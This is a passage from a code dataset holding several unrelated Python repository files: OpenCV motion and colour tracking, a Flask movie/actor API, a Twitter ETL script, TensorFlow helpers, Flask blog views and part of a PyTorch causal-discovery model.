# Go to the top of the while loop\n continue\n else:\n # Find the largest moving object in the image\n max_index = np.argmax(areas)\n # Draw the bounding box\n cnt = contours[max_index]\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n # Draw circle in the center of the bounding box\n x2 = x + int(w / 2)\n y2 = y + int(h / 2)\n cv2.circle(frame, (x2, y2), 4, (0, 255, 0), -1)\n # Print the centroid coordinates (we'll use the center of the\n # bounding box) on the image\n text = \"x: \" + str(x2) + \", y: \" + str(y2)\n cv2.putText(frame, text, (x2 - 10, y2 - 10),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n # Display the resulting frame\n cv2.imshow('view', frame)\n # If \"q\" is pressed on the keyboard, \n # exit this loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n # Close down the video stream\n cap.release()\n cv2.destroyAllWindows()\nif __name__ == '__main__':\n print(__doc__)\n main()","repo_name":"HandreGiarman/Object_Detection_Move_Sample","sub_path":"Object_Detection_Move_Sample.py","file_name":"Object_Detection_Move_Sample.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3066845882","text":"cnt=0\nlst= [2,5,13]\nwhile True:\n\tif cnt >1000:\n\t\tbreak\n\tGubo = lst[-1]+lst[-1] + lst[-2] + lst[-3]\n\tlst.append(Gubo)\n\tcnt+=1\nwhile True:\n\ttry:\n\t\ta=int(input())\n\t\tprint(lst[a-1])\n\texcept:\n\t\tbreak","repo_name":"SoleMin/Algorithmic_Problems","sub_path":"110603/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73757991822","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\nfrom models import Movie, Actor, setup_db\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n # API Endpoints\n @app.route('/movies', methods=['GET'])\n @requires_auth('get:movies')\n def get_movies(payload):\n '''\n GET /movies\n\n returns status code 200 and json \n {\"success\": True, \"movies\": movies} \n where movies is the list of movies\n OR appropriate status code indicating reason for failure\n '''\n movies = Movie.query.order_by(Movie.id).all()\n\n if len(movies) == 0:\n abort(404)\n\n return jsonify({\n 'success': True,\n 'movies': [movie.format() for movie in movies]\n })\n\n @app.route('/movies', methods=['POST'])\n @requires_auth('post:movies')\n def post_movies(payload):\n '''\n POST /movies\n\n returns status code 200 and json {\"success\": True, \"created\": id}\n where id is the id of the created movie\n OR appropriate status code indicating reason for failure\n '''\n data = request.get_json()\n\n if not data:\n abort(400)\n\n title = data.get('title', None)\n release_date = data.get('release_date', None)\n\n if None in [title, release_date]:\n abort(422)\n\n try:\n new_movie = Movie(\n title=title,\n release_date=release_date\n )\n new_movie.insert()\n\n except:\n Movie.rollback()\n abort(422)\n\n return jsonify({\n 'success': True,\n 'created': new_movie.id\n })\n\n @app.route('/movies/', methods=['PATCH'])\n @requires_auth('patch:movies')\n def patch_movies(payload, id):\n '''\n PATCH /movies\n\n returns status code 200 and json {\"success\": True, \"movie\": movie}\n where movie is the movie modified attributes\n OR appropriate status code indicating reason for failure\n '''\n movie = Movie.query.get_or_404(id)\n\n data = request.get_json()\n\n if not data:\n abort(400)\n\n title = data.get('title', None)\n release_date = data.get('release_date', None)\n\n try:\n if title:\n movie.title = title\n if release_date:\n movie.release_date = release_date\n movie.update()\n\n except:\n Movie.rollback()\n abort(422)\n\n return jsonify({\n 'success': True,\n 'movie': [movie.format()]\n })\n\n @app.route('/movies/', methods=['DELETE'])\n @requires_auth('delete:movies')\n def delete_movie(payload, id):\n '''\n DELETE /movies\n\n returns status code 200 and json {\"success\": True, \"deleted\": id}\n where id is the id of deleted movie\n OR appropriate status code indicating reason for failure\n '''\n\n movie = Movie.query.get_or_404(id)\n\n try:\n movie.delete()\n\n except:\n Movie.rollback()\n abort(422)\n\n return jsonify({\n 'success': True,\n 'deleted': movie.id\n })\n\n @app.route('/actors', methods=['GET'])\n @requires_auth('get:actors')\n def get_actors(payload):\n '''\n GET /actors\n\n returns status code 200 and json \n {\"success\": True, \"actors\": actors} \n where actors is the list of actors\n OR appropriate status code indicating reason for failure\n '''\n actors = Actor.query.order_by(Actor.id).all()\n\n if len(actors) == 0:\n abort(404)\n\n return jsonify({\n 'success': True,\n 'actors': [actor.format() for actor in actors]\n })\n\n @app.route('/actors', methods=['POST'])\n @requires_auth('post:actors')\n def post_actors(payload):\n '''\n POST /actors\n\n returns status code 200 and json {\"success\": True, \"created\": id}\n where id is the id of the created actor\n OR appropriate status code indicating reason for failure\n '''\n data = request.get_json()\n\n if not data:\n abort(400)\n\n name = data.get('name', None)\n age = data.get('age', None)\n gender = data.get('gender', None)\n\n if None in [name, age, gender]:\n abort(422)\n\n try:\n new_actor = Actor(\n name=name,\n age=age,\n gender=gender\n )\n new_actor.insert()\n\n except:\n Actor.rollback()\n abort(422)\n\n return jsonify({\n 'success': True,\n 'created': new_actor.id\n })\n\n @app.route('/actors/', methods=['PATCH'])\n @requires_auth('patch:actors')\n def patch_actors(payload, id):\n '''\n PATCH /actors\n\n returns status code 200 and json {\"success\": True, \"actor\": actor}\n where actor is the actor modified attributes\n OR appropriate status code indicating reason for failure\n '''\n actor = Actor.query.get_or_404(id)\n\n data = request.get_json()\n\n if not data:\n abort(400)\n\n name = data.get('name', None)\n age = data.get('age', None)\n gender = data.get('gender', None)\n\n try:\n if name:\n actor.name = name\n if age:\n actor.age = age\n if gender:\n actor.gender = gender\n actor.update()\n\n except:\n Actor.rollback()\n abort(422)\n\n return jsonify({\n 'success': True,\n 'actor': [actor.format()]\n })\n\n @app.route('/actors/', methods=['DELETE'])\n @requires_auth('delete:actors')\n def delete_actor(payload, id):\n '''\n DELETE /actors\n\n returns status code 200 and json {\"success\": True, \"deleted\": id}\n where id is the id of deleted actor\n OR appropriate status code indicating reason for failure\n '''\n actor = Actor.query.get_or_404(id)\n\n try:\n actor.delete()\n\n except:\n Actor.rollback()\n abort(422)\n\n return jsonify({\n 'success': True,\n 'deleted': actor.id\n })\n\n # Error Handling\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 400\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'resource not found'\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(AuthError)\n def authentication_error(error):\n if 'description' in error.error:\n message = error.error['description']\n else:\n message = 'authentication error'\n return jsonify({\n 'success': False,\n 'error': error.status_code,\n 'message': message\n }), error.status_code\n\n return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","repo_name":"GaBrandao/full-stack-nanodegree","sub_path":"capstone/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27108443811","text":"import os\nimport json\nimport tweepy\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nload_dotenv()\n\nimport pandas as pd\n\n\ndef run_etl():\n\n bearer = os.environ.get('BEARER')\n\n\n client = tweepy.Client(bearer_token=bearer)\n query = 'harcelement OR violence -is:retweet'\n\n tweets = client.search_recent_tweets(query=query,\n expansions=['author_id'],\n tweet_fields=['created_at', 'lang'],\n max_results=100)\n\n tweet_list = []\n users = {u['id']:u for u in tweets.includes['users']}\n\n for tweet in tweets.data:\n if users[tweet.author_id]:\n user = users[tweet.author_id]\n text = tweet['text']\n\n refined_tweet = {\"user_id\":user['id'],\n \"user_name\":user['name'],\n \"text\":text}\n\n tweet_list.append(refined_tweet)\n\n df = pd.DataFrame(tweet_list)\n df.to_csv(\"s3://airflow-omdena/harcelement.csv\")\n\n","repo_name":"HemanthSai7/Twitter_ETL_pipeline","sub_path":"twitter_etl.py","file_name":"twitter_etl.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39507815892","text":"import os\nimport re\nimport math\nimport yaml\nimport tensorflow.keras as keras\n\n\n#\n# I/O\n#\ndef read_yaml(path,*key_path):\n \"\"\" read yaml file\n path: path to yaml file\n *key_path: keys to go to in object\n \"\"\" \n with open(path,'rb') as file:\n obj=yaml.safe_load(file)\n for k in key_path:\n obj=obj[k]\n return obj\n\n\ndef read_json(path,*key_path):\n \"\"\" read json file\n path: path to json file\n *key_path: keys to go to in object\n \"\"\" \n with open(path,'rb') as file:\n obj=json.load(file)\n for k in key_path:\n obj=obj[k]\n return obj\n\n\n#\n# PYTHON\n#\n_SNAKE_RGX=re.compile('((?<=[a-z0-9])[A-Z]|(?!^)[A-Z](?=[a-z]))')\ndef snake(string):\n return _SNAKE_RGX.sub(r'_\\1',str(string)).lower()\n\n\ndef camel(string):\n return re.sub('[\\ \\-\\_]','',str(string).title())\n\n\ndef falsey(value):\n if isinstance(value,str):\n value=value.lower()!='false'\n return value is False\n\n\ndef truey(value):\n if isinstance(value,str):\n value=value.lower()=='true'\n return value is True\n\n\ndef noney(value):\n if isinstance(value,str) and value.lower()=='none':\n value=None\n return value is None\n\n\n#\n# UTILS\n#\nclass StrideManager(object):\n\n\n def __init__(self,output_stride,keep_mid_step=False,keep_indices=True):\n self.output_stride=output_stride\n self.strided_steps=round(math.log2(output_stride))\n self._set_keepers(keep_mid_step,keep_indices)\n self.reset()\n\n\n def step(self,strides=True):\n if strides is True:\n strides=2\n if (strides>1):\n self.stride_index+=1\n new_output_stride=self.current_output_stride*strides\n if new_output_stride>=self.output_stride:\n self.at_max_stride=True\n self.dilation_index+=1\n self.dilation_rate*=strides\n self.stride_state=1\n self.keep_index=False\n else:\n self.current_output_stride=new_output_stride\n self.keep_index=self._keep_index()\n\n\n def strides(self,strides=None):\n if self.at_max_stride:\n return 1\n else:\n if (strides is None) or (strides is True):\n strides=2\n elif strides is False:\n strides=1\n return strides\n\n\n def reset(self):\n self.stride_index=0\n self.dilation_index=0\n self.dilation_rate=1\n self.stride_state=2\n self.current_output_stride=1\n self.at_max_stride=False\n self.keep_index=self._keep_index()\n\n\n def _keep_index(self):\n if isinstance(self.keep_indices,list):\n return self.stride_index in self.keep_indices\n else:\n return self.keep_indices\n\n\n def _set_keepers(self,keep_mid_step,keep_indices):\n if keep_mid_step:\n self.keep_indices=[keep_mid_step]\n else:\n self.keep_indices=keep_indices\n if self.keep_indices is True:\n self.nb_keepers=self.strided_steps\n elif self.keep_indices:\n self.nb_keepers=len(self.keep_indices)\n else:\n self.nb_keepers=0\n\n\n#\n# FINE TUNING\n#\ndef swap_top(model,top,inputs=None,inputs_shape=None,swap_index=-2,noisy=True):\n if inputs is None:\n if inputs_shape is None:\n inputs=model.inputs\n else:\n inputs=keras.Input(shape=inputs_shape)\n model.trainable=False\n if swap_index:\n if noisy:\n print('SWAP TOP AFTER:',model.layers[swap_index].name)\n model=keras.Model(model.inputs, model.layers[swap_index].output)\n return keras.Model(inputs,top(model(inputs,training=False)))\n\n\n\ndef match_layer(\n name=None,\n index=None,\n matches=[],\n indices=[],\n searches=[],\n excludes=[]):\n match=False\n if name:\n if name in matches:\n match=True\n else:\n found=next((s for s in searches if s in name),False)\n if found:\n exclude=next((e for e in excludes if e in name),False)\n if not exclude:\n match=True\n if index and indices:\n match=index in indices\n return match\n \n\ndef set_trainable(\n model,\n matches=[],\n indices=[],\n searches=[],\n excludes=[],\n trainable=True,\n return_matched=False,\n noisy=False):\n if matches or indices or searches:\n matches=_as_list(matches)\n indices=_as_list(indices)\n searches=_as_list(searches)\n excludes=_as_list(excludes)\n indices=[int(i) for i in indices]\n if return_matched:\n matched=[]\n for i,l in enumerate(model.layers):\n match=match_layer(\n name=l.name,\n index=i,\n matches=matches,\n indices=indices,\n searches=searches,\n excludes=excludes)\n l.trainable=bool(trainable==match)\n if return_matched and match:\n matched.append(l)\n if noisy and match:\n print(l.name,l.trainable)\n if return_matched:\n return matched\n\n\n#\n# CONSTANTS\n#\nCOLORS=[\n '#8dd3c7',\n '#ffffb3',\n '#bebada',\n '#fb8072',\n '#80b1d3',\n '#fdb462',\n '#b3de69',\n '#fccde5',\n '#d9d9d9',\n '#bc80bd',\n '#ccebc5',\n '#ffed6f',\n '#e41a1c',\n '#377eb8',\n '#4daf4a',\n '#984ea3',\n '#ff7f00',\n '#ffff33',\n '#a65628',\n '#f781bf',\n '#999999',\n '#66c2a5',\n '#fc8d62',\n '#8da0cb',\n '#e78ac3',\n '#a6d854',\n '#ffd92f',\n '#e5c494',\n '#b3b3b3'\n]\n\n#\n# INTERNAL\n#\ndef _as_list(value):\n if value in [None,False]:\n value=[]\n elif not isinstance(value,list):\n value=[value]\n return value\n\n\n\n\n\n\n\n\n\n\n","repo_name":"brookisme/tfbox","sub_path":"tfbox/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1318690345","text":"import numpy as np\nimport cv2 as cv\n\nclass TrackObject():\n def __init__(self, image):\n super().__init__()\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0 \n self.image = image\n\n\n def get_shape(self):\n return self.image.shape\n\n\n def track(self):\n copy_image = self.image.copy()\n\n hsv_image = cv.cvtColor(self.image, cv.COLOR_BGR2HSV)\n lowerlimit = np.array([29, 86, 100])\n upperlimit = np.array([64, 255, 255])\n\n mask = cv.inRange(hsv_image, lowerlimit, upperlimit)\n mask = cv.erode(mask, None, iterations=2) \n mask = cv.dilate(mask, None, iterations=2)\n\n contours, hierarchy = cv.findContours(mask, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n if contours.__len__() != 0:\n cv.drawContours(copy_image, contours, -1, 255, 3)\n max_contor = max(contours, key=cv.contourArea)\n self.x, self.y, self.w, self.h = cv.boundingRect(max_contor)\n return(self.x, self.y, self.w, self.h)\n else:\n return \"Human out of range!!\"","repo_name":"Nabin-Flash320/Cart-UI","sub_path":"TrackObject.py","file_name":"TrackObject.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70348675342","text":"#\n# -*- coding: utf-8 -*-\n#\n# @Author: Arrack\n# @Date: 2020-05-25 18:22:18\n# @Last modified by: Arrack\n# @Last Modified time: 2020-06-10 15:47:49\n#\n\nfrom flask import Blueprint\nfrom flask import current_app\nfrom flask import flash\nfrom flask import redirect\nfrom flask import request\nfrom flask import render_template\nfrom flask import url_for\n\nfrom app.extensions import db\nfrom app.forms import TalkForm\nfrom app.models import Article\nfrom app.models import Category\nfrom app.models import Tag\nfrom app.models import Talk\nfrom app.viewmodels import TalkViewModel, TalksViewModel\n\n\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/')\ndef index():\n page = request.args.get('page', 1, type=int)\n pagination = Article.query.order_by(Article.createTime.desc()).paginate(\n page, per_page=current_app.config['ARTICLES_PER_PAGE'])\n return render_template('main/index.html', pagination=pagination)\n\n\n@bp.route('/article/')\ndef article(aid):\n post = Article.query.get(aid)\n tags = [item.tag.name for item in post.tags]\n return render_template('main/article.html', article=post, tags=tags)\n\n\n@bp.route('/category/')\ndef category(name):\n cate = Category.query.filter_by(name=name).first()\n return render_template('main/category.html', category=cate)\n\n\n@bp.route('/tag/')\ndef tag(name):\n tag = Tag.query.filter_by(name=name).first()\n articles = [item.article for item in tag.articles]\n return render_template('main/tag.html', tag=tag, articles=articles)\n\n\n@bp.route('/talktalk', methods=['GET', 'POST'])\ndef talks():\n form = TalkForm(request.form)\n\n if request.method == 'POST' and form.validate():\n content = form.content.data\n try:\n t = Talk(content=content)\n db.session.add(t)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n flash(e.message, category='error')\n else:\n flash('话唠,闲的慌是不?')\n return redirect(url_for('main.talks'))\n\n page = request.args.get('page', 1, type=int)\n pagination = Talk.query.order_by(Talk.createTime.desc()).paginate(\n page, per_page=current_app.config['TALKS_PER_PAGE'])\n talks = [TalkViewModel(t) for t in pagination.items]\n talks = TalksViewModel(talks)\n return render_template('main/talks.html', form=form, talks=talks, pagination=pagination)\n\n\n@bp.route('/about')\ndef about():\n return render_template('main/about.html')\n\n\n# @bp.route('/article///')\n# def article(year, month, title):\n# url = join('/article', year, month, title)\n# article = Article.query.filter_by(url=url).first()\n# article_body = markdown_to_html(article.body)\n# return render_template(\n# 'blog/article.html', article=article, article_body=article_body)\n\n\n# @bp.route('/category/<category>')\n# def category(category):\n# articles = Category.query.filter_by(name=category).first().articles.order_by(Article.id.desc())\n# return render_template(\n# 'blog/category.html', category=category, articles=articles)\n\n\n# @bp.route('/tag/<tag>')\n# def tag(tag):\n# articles = Tag.query.filter_by(name=tag).first().articles.order_by(Article.id.desc())\n# return render_template(\n# 'blog/tag.html', tag=tag, articles=articles)\n\n\n# @bp.route('/talktalk', methods=['GET', 'POST'])\n# def talktalk():\n# form = TalkForm()\n# if form.validate_on_submit():\n# talk = Talk(\n# content=form.content.data,\n# private=form.private.data)\n# db.session.add(talk)\n# db.session.commit()\n# flash('能比比尽量别动手。')\n# return redirect(url_for('blog.talktalk'))\n\n# first_id = Top.query.filter_by(type='talk').first().foreign_id\n# first = Talk.query.get(first_id).first()\n\n# # TODO private, auth, flash, style\n# talks = Talk.query.filter(Talk.id != first_id).order_by(Talk.id.desc()).all()\n# return render_template('blog/talktalk.html', first=first, talks=talks, form=form)\n","repo_name":"cqkenuo/Maybe","sub_path":"app/views/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74428011023","text":"import os\nimport numpy as np\nimport torch as th\nimport pandas as pd\nimport networkx as nx\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import scale\nfrom .model import GraphModel\nfrom ...utils.parallel import parallel_run\nfrom ...utils.loss import notears_constr\nfrom ...utils.torch import ChannelBatchNorm1d, MatrixSampler, Linear3D\nfrom ...utils.Settings import SETTINGS\n\n\nclass SAM_generators(th.nn.Module):\n \"\"\"Ensemble of all the SAM generators.\n\n Args:\n data_shape (tuple): Shape of the true data\n nh (int): Initial number of hidden units in the hidden layers\n skeleton (numpy.ndarray): Initial skeleton, defaults to a fully connected graph\n linear (bool): Enables the linear variant\n \"\"\"\n\n def __init__(self, data_shape, nh, skeleton=None, linear=False):\n \"\"\"Init the model.\"\"\"\n super(SAM_generators, self).__init__()\n layers = []\n # Building skeleton\n self.linear = linear\n nb_vars = data_shape[1]\n self.nb_vars = nb_vars\n if skeleton is None:\n skeleton = 1 - th.eye(nb_vars + 1, nb_vars) # 1 row for noise\n else:\n skeleton = th.cat([th.Tensor(skeleton), th.ones(1, nb_vars)], 1)\n if linear:\n self.input_layer = Linear3D((nb_vars, nb_vars + 1, 1))\n else:\n self.input_layer = Linear3D((nb_vars, nb_vars + 1, nh))\n layers.append(ChannelBatchNorm1d(nb_vars, nh))\n layers.append(th.nn.Tanh())\n self.output_layer = Linear3D((nb_vars, nh, 1))\n\n self.layers = th.nn.Sequential(*layers)\n self.register_buffer('skeleton', skeleton)\n\n def forward(self, data, noise, adj_matrix, drawn_neurons=None):\n \"\"\"Forward through all the generators.\n\n Args:\n data (torch.Tensor): True data\n noise (torch.Tensor): Samples of noise variables\n adj_matrix (torch.Tensor): Sampled adjacency matrix\n drawn_neurons (torch.Tensor): Sampled matrix of active neurons\n\n Returns:\n torch.Tensor: Batch of generated data\n \"\"\"\n\n if self.linear:\n output = self.input_layer(data, noise, adj_matrix * self.skeleton)\n else:\n output = self.output_layer(self.layers(self.input_layer(data,\n noise,\n adj_matrix * self.skeleton)),\n drawn_neurons)\n\n return output.squeeze(2)\n\n def reset_parameters(self):\n if not self.linear:\n self.output_layer.reset_parameters()\n for layer in self.layers:\n if hasattr(layer, 'reset_parameters'):\n layer.reset_parameters()\n self.input_layer.reset_parameters()\n\n\nclass SAM_discriminator(th.nn.Module):\n \"\"\"SAM discriminator.\n\n Args:\n nfeatures (int): Number of variables in the dataset\n dnh (int): Number of hidden units in the hidden layers\n hlayers (int): Number of hidden layers\n mask (numpy.ndarray): Mask of connections to ignore\n \"\"\"\n\n def __init__(self, nfeatures, dnh, hlayers=2, mask=None):\n super(SAM_discriminator, self).__init__()\n self.nfeatures = nfeatures\n layers = []\n layers.append(th.nn.Linear(nfeatures, dnh))\n layers.append(th.nn.BatchNorm1d(dnh))\n layers.append(th.nn.LeakyReLU(.2))\n for i in range(hlayers-1):\n layers.append(th.nn.Linear(dnh, dnh))\n layers.append(th.nn.BatchNorm1d(dnh))\n layers.append(th.nn.LeakyReLU(.2))\n\n layers.append(th.nn.Linear(dnh, 1))\n self.layers = th.nn.Sequential(*layers)\n\n if mask is None:\n mask = th.eye(nfeatures, nfeatures)\n self.register_buffer(\"mask\", mask.unsqueeze(0))\n\n def forward(self, input, obs_data=None):\n \"\"\"Forward pass in the discriminator.\n\n Args:\n input (torch.Tensor): True Data or generated data\n obs_data (torch.Tensor): True data in the case of `input=generated` for padding.\n\n Returns:\n torch.Tensor: Output of the discriminator\n \"\"\"\n if obs_data is not None:\n return [self.layers(i) for i in th.unbind(obs_data.unsqueeze(1) * (1 - self.mask)\n + input.unsqueeze(1) * self.mask, 1)]\n else:\n return self.layers(input)\n\n def reset_parameters(self):\n for layer in self.layers:\n if hasattr(layer, 'reset_parameters'):\n layer.reset_parameters()\n\n\ndef run_SAM(in_data, skeleton=None, device=\"cpu\",\n train=5000, test=1000,\n batch_size=-1, lr_gen=.001,\n lr_disc=.01, lambda1=0.001, lambda2=0.0000001, nh=None, dnh=None,\n verbose=True, losstype=\"fgan\",\n dagstart=0, dagloss=False,\n dagpenalization=0.05, dagpenalization_increase=0.0,\n linear=False, hlayers=2, idx=0):\n\n list_nodes = list(in_data.columns)\n data = scale(in_data[list_nodes].values)\n nb_var = len(list_nodes)\n data = data.astype('float32')\n data = th.from_numpy(data).to(device)\n if batch_size == -1:\n batch_size = data.shape[0]\n rows, cols = data.size()\n # Get the list of indexes to ignore\n if skeleton is not None:\n skeleton = th.from_numpy(skeleton.astype('float32'))\n\n sam = SAM_generators((batch_size, cols), nh, skeleton=skeleton,\n linear=linear).to(device)\n\n sam.reset_parameters()\n g_optimizer = th.optim.Adam(list(sam.parameters()), lr=lr_gen)\n\n if losstype != \"mse\":\n discriminator = SAM_discriminator(cols, dnh, hlayers).to(device)\n discriminator.reset_parameters()\n d_optimizer = th.optim.Adam(discriminator.parameters(), lr=lr_disc)\n criterion = th.nn.BCEWithLogitsLoss()\n else:\n criterion = th.nn.MSELoss()\n disc_loss = th.zeros(1)\n\n graph_sampler = MatrixSampler(nb_var, mask=skeleton,\n gumbel=False).to(device)\n graph_sampler.weights.data.fill_(2)\n graph_optimizer = th.optim.Adam(graph_sampler.parameters(), lr=lr_gen)\n\n if not linear:\n neuron_sampler = MatrixSampler((nh, nb_var), mask=False,\n gumbel=True).to(device)\n neuron_optimizer = th.optim.Adam(list(neuron_sampler.parameters()),\n lr=lr_gen)\n\n _true = th.ones(1).to(device)\n _false = th.zeros(1).to(device)\n output = th.zeros(nb_var, nb_var).to(device)\n\n noise = th.randn(batch_size, nb_var).to(device)\n noise_row = th.ones(1, nb_var).to(device)\n data_iterator = DataLoader(data, batch_size=batch_size,\n shuffle=True, drop_last=True)\n\n # RUN\n if verbose:\n pbar = tqdm(range(train + test))\n else:\n pbar = range(train+test)\n for epoch in pbar:\n for i_batch, batch in enumerate(data_iterator):\n g_optimizer.zero_grad()\n graph_optimizer.zero_grad()\n\n if losstype != \"mse\":\n d_optimizer.zero_grad()\n\n if not linear:\n neuron_optimizer.zero_grad()\n\n # Train the discriminator\n\n if not epoch > train:\n drawn_graph = graph_sampler()\n if not linear:\n drawn_neurons = neuron_sampler()\n else:\n drawn_neurons = None\n noise.normal_()\n generated_variables = sam(batch, noise,\n th.cat([drawn_graph, noise_row], 0),\n drawn_neurons)\n\n if losstype == \"mse\":\n gen_loss = criterion(generated_variables, batch)\n else:\n disc_vars_d = discriminator(generated_variables.detach(), batch)\n disc_vars_g = discriminator(generated_variables, batch)\n true_vars_disc = discriminator(batch)\n\n if losstype == \"gan\":\n disc_loss = sum([criterion(gen, _false.expand_as(gen)) for gen in disc_vars_d]) / nb_var \\\n + criterion(true_vars_disc, _true.expand_as(true_vars_disc))\n # Gen Losses per generator: multiply py the number of channels\n gen_loss = sum([criterion(gen,\n _true.expand_as(gen))\n for gen in disc_vars_g])\n elif losstype == \"fgan\":\n\n disc_loss = sum([th.mean(th.exp(gen - 1)) for gen in disc_vars_d]) / nb_var - th.mean(true_vars_disc)\n gen_loss = -sum([th.mean(th.exp(gen - 1)) for gen in disc_vars_g])\n\n disc_loss.backward()\n d_optimizer.step()\n\n filters = graph_sampler.get_proba()\n\n struc_loss = lambda1*drawn_graph.sum()\n\n func_loss = 0 if linear else lambda2*drawn_neurons.sum()\n regul_loss = struc_loss + func_loss\n\n if dagloss and epoch > train * dagstart:\n dag_constraint = notears_constr(filters*filters)\n loss = gen_loss + regul_loss + (dagpenalization +\n (epoch - train * dagstart)\n * dagpenalization_increase) * dag_constraint\n else:\n loss = gen_loss + regul_loss\n if verbose and epoch % 20 == 0 and i_batch == 0:\n pbar.set_postfix(gen=gen_loss.item()/cols,\n disc=disc_loss.item(),\n regul_loss=regul_loss.item(),\n tot=loss.item())\n\n if epoch < train + test - 1:\n loss.backward(retain_graph=True)\n\n if epoch >= train:\n output.add_(filters.data)\n\n g_optimizer.step()\n graph_optimizer.step()\n if not linear:\n neuron_optimizer.step()\n\n return output.div_(test).cpu().numpy()\n\n\nclass SAM(GraphModel):\n \"\"\"SAM Algorithm.\n\n **Description:** Structural Agnostic Model is an causal discovery algorithm\n for DAG recovery leveraging both distributional asymetries and conditional\n independencies. the first version of SAM without DAG constraint is available\n as ``SAMv1``.\n\n **Data Type:** Continuous\n\n **Assumptions:** The class of generative models is not restricted with a\n hard contraint, but with soft constraints parametrized with the ``lambda1``\n and ``lambda2`` parameters, with gumbel softmax sampling. This algorithms greatly\n benefits from bootstrapped runs (nruns >=8 recommended).\n GPUs are recommended but not compulsory. The output is a DAG, but may need a\n thresholding as the output is averaged over multiple runs.\n\n Args:\n lr (float): Learning rate of the generators\n dlr (float): Learning rate of the discriminator\n lambda1 (float): L0 penalization coefficient on the causal filters\n lambda2 (float): L0 penalization coefficient on the hidden units of the\n neural network\n nh (int): Number of hidden units in the generators' hidden layers\n (regularized with lambda2)\n dnh (int): Number of hidden units in the discriminator's hidden layer\n train_epochs (int): Number of training epochs\n test_epochs (int): Number of test epochs (saving and averaging\n the causal filters)\n batch_size (int): Size of the batches to be fed to the SAM model.\n Defaults to full-batch.\n losstype (str): type of the loss to be used (either 'fgan' (default),\n 'gan' or 'mse').\n hlayers (int): Defines the number of hidden layers in the discriminator.\n dagloss (bool): Activate the DAG with No-TEARS constraint.\n dagstart (float): Controls when the DAG constraint is to be introduced\n in the training (float ranging from 0 to 1, 0 denotes the start of\n the training and 1 the end).\n dagpenalisation (float): Initial value of the DAG constraint.\n dagpenalisation_increase (float): Increase incrementally at each epoch\n the coefficient of the constraint.\n linear (bool): If true, all generators are set to be linear generators.\n nruns (int): Number of runs to be made for causal estimation.\n Recommended: >=8 for optimal performance.\n njobs (int): Numbers of jobs to be run in Parallel.\n Recommended: 1 if no GPU available, 2*number of GPUs else.\n gpus (int): Number of available GPUs for the algorithm.\n verbose (bool): verbose mode\n\n .. note::\n Ref: Kalainathan, Diviyan & Goudet, Olivier & Guyon, Isabelle &\n Lopez-Paz, David & Sebag, Michèle. (2018). Structural Agnostic Modeling:\n Adversarial Learning of Causal Graphs.\n\n Example:\n >>> import networkx as nx\n >>> from cdt.causality.graph import SAM\n >>> from cdt.data import load_dataset\n >>> data, graph = load_dataset(\"sachs\")\n >>> obj = SAM()\n >>> #The predict() method works without a graph, or with a\n >>> #directed or undirected graph provided as an input\n >>> output = obj.predict(data) #No graph provided as an argument\n >>>\n >>> output = obj.predict(data, nx.Graph(graph)) #With an undirected graph\n >>>\n >>> output = obj.predict(data, graph) #With a directed graph\n >>>\n >>> #To view the graph created, run the below commands:\n >>> nx.draw_networkx(output, font_size=8)\n >>> plt.show()\n \"\"\"\n\n def __init__(self, lr=0.01, dlr=0.01, lambda1=0.01, lambda2=0.00001, nh=200, dnh=200,\n train_epochs=10000, test_epochs=1000, batchsize=-1,\n losstype=\"fgan\", dagstart=0.5, dagloss=True, dagpenalization=0,\n dagpenalization_increase=0.001, linear=False, hlayers=2,\n njobs=None, gpus=None, verbose=None, nruns=8):\n\n \"\"\"Init and parametrize the SAM model.\"\"\"\n super(SAM, self).__init__()\n self.lr = lr\n self.dlr = dlr\n self.lambda1 = lambda1\n self.lambda2 = lambda2\n self.nh = nh\n self.dnh = dnh\n self.train = train_epochs\n self.test = test_epochs\n self.batchsize = batchsize\n self.losstype = losstype\n self.dagstart = dagstart\n self.dagloss = dagloss\n self.dagpenalization = dagpenalization\n self.dagpenalization_increase = dagpenalization_increase\n self.linear = linear\n self.hlayers = hlayers\n self.njobs = 